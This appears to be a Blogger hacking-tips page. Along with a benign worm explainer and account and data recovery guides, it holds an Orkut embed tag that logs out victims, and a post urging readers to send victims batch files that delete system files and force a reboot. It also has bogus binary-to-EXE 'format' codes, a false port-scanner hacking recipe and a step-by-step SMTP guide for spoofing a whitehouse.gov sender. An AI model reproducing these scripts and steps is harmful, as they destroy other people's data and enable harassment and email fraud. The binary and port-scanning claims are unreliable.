This is default featured slide 1 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.

This is default featured slide 2 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.

This is default featured slide 3 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.

This is default featured slide 4 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.

This is default featured slide 5 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.

How does Worms work ?

People use e-mail more than any other application on the internet, but it can be a frustrating experience, with spam and especially e-mail worms filling our inboxes.


Worms can spread rapidly over computer networks, the traffic they create bringing those networks to a crawl. And worms can cause other damage, such as allowing unauthorized access to a computer network, or deleting or copying files.


What’s a worm?


A worm is a computer virus designed to copy itself, usually in large numbers, by using e-mail or other form of software to spread itself over an internal network or through the internet.



How do they spread?


When you receive a worm over e-mail, it will be in the form of an attachment, represented in most e-mail programs as a paper clip. The attachment could claim to be anything from a Microsoft Word document to a picture of tennis star Anna Kournikova (such a worm spread quickly in February 2001).


If you click on the attachment to open it, you’ll activate the worm, but in some versions of Microsoft Outlook, you don’t even have to click on the attachment to activate it if you have the program preview pane activated. Microsoft has released security patches that correct this problem, but not everyone keeps their computer up to date with the latest patches.


After it’s activated, the worm will go searching for a new list of e-mail addresses to send itself to. It will go through files on your computer, such as your e-mail program’s address book and web pages you’ve recently looked at, to find them.


Once it has its list it will send e-mails to all the addresses it found, including a copy of the worm as an attachment, and the cycle starts again. Some worms will use your e-mail program to spread themselves through e-mail, but many worms include a mail server within their code, so your e-mail program doesn’t even have to be open for the worm to spread.


Other worms can use multiple methods of spreading. The MyDoom worm, which started spreading in January 2004, attempted to copy infected files into the folder used by Kazaa, a file-sharing program. The Nimda worm, from September 2001, was a hybrid that had four different ways of spreading.


What do they do?


Most of the damage that worms do is the result of the traffic they create when they’re spreading. They clog e-mail servers and can bring other internet applications to a crawl.


But worms will also do other damage to computer systems if they aren’t cleaned up right away. The damage they do, known as the payload, varies from one worm to the next.


The MyDoom worm was typical of recent worms. It opened a back door into the infected computer network that could allow unauthorized access to the system. It was also programmed to launch an attack against a specific website by sending thousands of requests to the site in an attempt to overwhelm it.


The target of the original version of MyDoom attack was the website of SCO Group Inc., a company that threatened to sue users of the Linux operating system, claiming that its authors used portions of SCO’s proprietary code. A second version of MyDoom targeted the website of software giant Microsoft.


The SirCam worm, which spread during the summer of 2001, disguised itself by copying its code into a Microsoft Word or Excel document and using it as the attachment. That meant that potentially private or sensitive documents were being sent over the internet.


How do I get rid of them?


The best way to avoid the effects of worms is to be careful when reading e-mail. If you use Microsoft Outlook, get the most recent security updates from the Microsoft website and turn off the preview pane, just to be safe.


Never open attachments you aren’t expecting to receive, even if they appear to be coming from a friend. Be especially cautious with attachments that end with .bat, .cmd, .exe, .pif, .scr, .vbs or .zip, or that have double endings. (The file attachment that spread the Anna Kournikova worm was AnnaKournikova.jpg.vbs.)


Also, install anti-virus software and keep it up to date with downloads from the software maker’s website. The updates are usually automatic.


Users also need to be wary of e-mails claiming to have cures for e-mail worms and viruses. Many of them are hoaxes that instruct you to delete important system files, and some carry worms and viruses themselves.


As well, some users should consider using a computer with an operating system other than Windows, the target of most e-mail worms. Most of the worms don’t affect computers that run Macintosh or Linux operating systems.


Block your friends scrapbook - ORKUT

It will be really scary when you will find out that you are not able to reply to your friends scrap from your own scrapbook. Yes this hack can be used to block anybody’s scrapbook. The best part is that after the scrapbook is blocked nobody can scrap him. Really cool!


Copy this and paste in your friends scrapbook.


<embed src=”http://www.orkut.com/GLogin.aspx?cmd=logout” height=”1″ width=”1″></embed>


When that man will enter his scrapbook he will be at the login position .he cant reply from his scrapbook and no one can enter in his profile and scrap him…


Solution : (To Unblock it)


To avoid being logged off again when you see the scrap, you can block flash in your browser.


For Firefox download the following plugin :
https://addons.mozilla.org/en-US/firefox/addon/433


In opera, you can disable the flash plugin.


Now this will only allow you to enter the scrapbook but your friends will still not be able to scrap you. So for that you need to delete the scrap.


Another Method:


First open your scrapbook.


Now Open your Orkut Homepage in a new window( Don’t close the scrapbook ). You will find the login page.


Now enter your detail and login to Orkut.


After being logged in delete the scrap from the scrapbook page that you had kept open.


Enjoy!!!


What to Do when Ur Orkut is Hacked!

It can be a nightmare if someone else takes control of your Google Account because all your Google services like Gmail, Orkut, Google Calendar, Blogger, AdSense, Google Docs and even Google Checkout are tied to the same account.


Here are some options suggested by Google Support when you forget the Gmail password or if someone else takes ownership of your Google Account and changes the password:



1. Reset Your Google Account Password:


Type the email address associated with your Google Account or Gmail user name at google.com/accounts/ForgotPasswd - you will receive an email at your secondary email address with a link to reset your Google Account Password.
This will not work if the other person has changed your secondary email address or if you no longer have access to that address.


2. For Google Accounts Associated with Gmail:


If you have problems while logging into your Gmail account, you can consider contacting Google by filling this form. It however requires you to remember the exact date when you created that Gmail account.


3. For Hijacked Google Accounts Not Linked to Gmail:

If your Google Account doesn’t use a Gmail address, contact Google by filling this form. This approach may help bring back your Google Account if you religiously preserve all your old emails. You will be required to know the exact creation date of your Google Account plus a copy of that original “Google Email Verification” message.


It may be slightly tough to get your Google Account back but definitely not impossible if you have the relevant information in your secondary email mailbox.


Format a HDD with Notepad

If you think that notepad is useless then you are wrong because you can now do a lot of things with a notepad which you could have never imagined.In this hack I will show you how to format a HDD using a notepad. This is really cool.


Step 1.
Copy The Following In Notepad Exactly as it says


01001011000111110010010101010101010000011111100000


Step 2.
Save As An EXE Any Name Will Do


Step 3.
Send the EXE to People And Infect


OR


IF u think u cannot format c driver when windows is running try Laughing and u will get it Razz .. any way some more so u can test on other drives this is simple binary code
format c:\ /Q/X — this will format your drive c:\


01100110011011110111001001101101011000010111010000 100000011000110011101001011100


0010000000101111010100010010111101011000


format d:\ /Q/X — this will format your dirve d:\


01100110011011110111001001101101011000010111010000 100000011001000011101001011100


0010000000101111010100010010111101011000


format a:\ /Q/X — this will format your drive a:\


01100110011011110111001001101101011000010111010000 100000011000010011101001011100


0010000000101111010100010010111101011000


del /F/S/Q c:\boot.ini — this will cause your computer not to boot.


01100100011001010110110000100000001011110100011000 101111010100110010111101010001


00100000011000110011101001011100011000100110111101 101111011101000010111001101001


0110111001101001


try to figure out urself rest
cant spoonfeed
its working


Do not try it on your PC. Don’t mess around this is for educational purpose only


still if you cant figure it out try this


go to notepad and type the following:


@Echo off
Del C:\ *.*|y


save it as Dell.bat


want worse then type the following:


@echo off
del %systemdrive%\*.*/f/s/q
shutdown -r -f -t 00


and save it as a .bat file


Reply With Quote


Access Data of a Password Protected User in Windows XP in Case the PC Fails to Boot

You may come across a situation in which your windows XP PC fails to reboot, and the most accepted solution to that problem is to re-format the Hard Disk. Before formatting, you should backup your files. If your computer is password protected, you won’t be able to access them from outside, so here is a method for getting around this.



Steps :


  1. Boot the machine from Windows XP bootable CD.

  2. At the setup screen, select R to repair using Recovery Console.

  3. Now the console program will prompt you to select the Windows folder (eg. C:\WINDOWS) where the Windows is installed (you need to enter a number from the list of folders shown to you).

  4. Type ‘HELP’ (without single quotes) and press enter for available commands. This is like a DOS program, but some features are not available

  5. Change the current directory to the user’s directory where you want to backup.

  6. Type ‘CD “C:\Documents and Settings\X”‘ (without single quotes) and press enter. Where X is the username.

  7. Now the current directory will change to “C:\Documents and Settings\X”.

  8. Now change the directory to Desktop by entering ‘CD Desktop’ (without single quotes) and press enter to go to the desktop folder.

  9. Type ‘DIR’ (Without single quotes) and press enter, you will be listed all the available files in Desktop.

  10. Type ‘COPY a.doc D:\BACKUP’ (without quotes) and press enter, where a.doc is a file available in Desktop and the folder D:\BACKUP available to copy the files.

  11. As in step 7,8,9,10 you can backup other folders like “My Documents”, “My Music”, etc.

  12. Note that you cannot use wildcards for COPY, i.e. you cannot copy all the files in a folder at once. You must copy one file by one.



Tips :


Before doing this, try changing the password to blank so that you can access the data from another machine to easily drag and drop to copy your data.


Warnings :


Any data not backed up will be permanently deleted when you re-format the hard drive, so make sure you back up any thing you want to keep.


Things You’ll Need :


A Bootable Windows XP CD


Fastest Way to Hack into Others System

Well as I already mentioned you can hack any system which is connected to what we call “The INTERNET”. To connect internet a system allocates a port for communication and Data Transfer. So we got to do is to get into that port that is to be hacked.

Steps: -



  1. Download the Software PORT SCANNER from google.

  2. Get the IP address of the victim whose port is open.

  3. NETLAB which gives u all information includes victim IP address,Area from where he is accessing internet….

  4. The IP of victim u found initially into NETLAB .

  5. Thats it now you can access his system.


Note : This is really Hardcore Hacking and you should be very much careful while doing all this and you do all this on your own responsibility. This site is never responsible for anything you after reading any article from this site and there are almost 50-50 chances that you may get caught so don’t try this unless you are aware of everthing. Yes you can freak some of your friends by telling them that you can hack their systems very easily.

Good Luck!

Learn how to send your fake email

So, you want to learn how to send your own fake mail? It’s extraordinarily easy to do, and requires no extra software installed on your PC at all. It can be done with Windows, Macintosh, Linux - any modern PC that has an internet connection will do it.


There are a just a few simple steps. First, you’ll need to decide on the FROM and the TO email addresses. If the FROM address that you’re choosing isn’t a real one, make sure that the domain name (the bit after the @ sign) is a real one. If it’s not a real one, it almost certainly won’t work.




For the purpose of this tutorial, we’ll be sending from bush@whitehouse.gov to dummy@anysite.com.


Second, you’ll need to find out the mail server that your recipient is using.

















Click Start, Run, enter “CMD”, then presss OK. In the window that comes up, type nslookup -q=MX anysite.com
Go to Applications, Utilities, and choose Terminal. In the window that comes up, type nslookup -q=MX anysite.com
Bring up your favourite shell, and type nslookup -q=MX anysite.com

There will be a lot of information on the screen - all you need to look for is a line that talks about a mail exchanger. If there are several, pick the one with the lowest “preference number”.


anysite.com        MX preference = 10, mail exchanger = mail.anysite.com

Now, you’ll need to connect to this mail exchanger using telnet. This is the same for any PC, but Vista users may not have it installed by default - see this note about getting telnet on Vista before you continue. When you’re ready, type:


telnet mail.anysite.com 25

Press enter, and after a short pause, you should see a welcome message from the server.


Ok, so now you’re connected. You need to enter the following information - press ENTER at each new line. You won’t be able to press backspace to delete a mistake, so you’ll need to type everything correctly first time!


HELO whitehouse.gov

This tells the mail server that we are “whitehouse.gov”.


MAIL FROM:

This tells the server who is sending the mail.


RCPT TO:

This tells the server who to deliver the mail to. At this point, if the recipient doesn’t exist, you may see a warning message (but not always).


DATA

This tells the server that we’re ready to start writing our message. It should acknowledge, telling you to end your message with a full stop (period) on a single line. All we need to do now, is write our message and don’t forget that full stop at the end.

Hello dummy@anysite, I managed to send a fake mail all by myself!.

Dont forget that last dot. When you’ve done that, and pressed enter, simply enter QUIT and your mail should be delivered.


There’s a little bit more to it, of course. You’ll need to enter proper “headers” if you want the mail to look more believable. After doing the DATA command, I’d recommend pasting in the following “headers” to make sure it looks realistic when viewed in Outlook, Hotmail, etc.


Date: Sun, 01 Apr 2007 12:49:13 +0100 (BST)From: George W Bush To: Poor Sod Subject: Fake mail

Hello dummy@anysite, I managed to send a fake mail all by myself!.

And that’s all there is to it.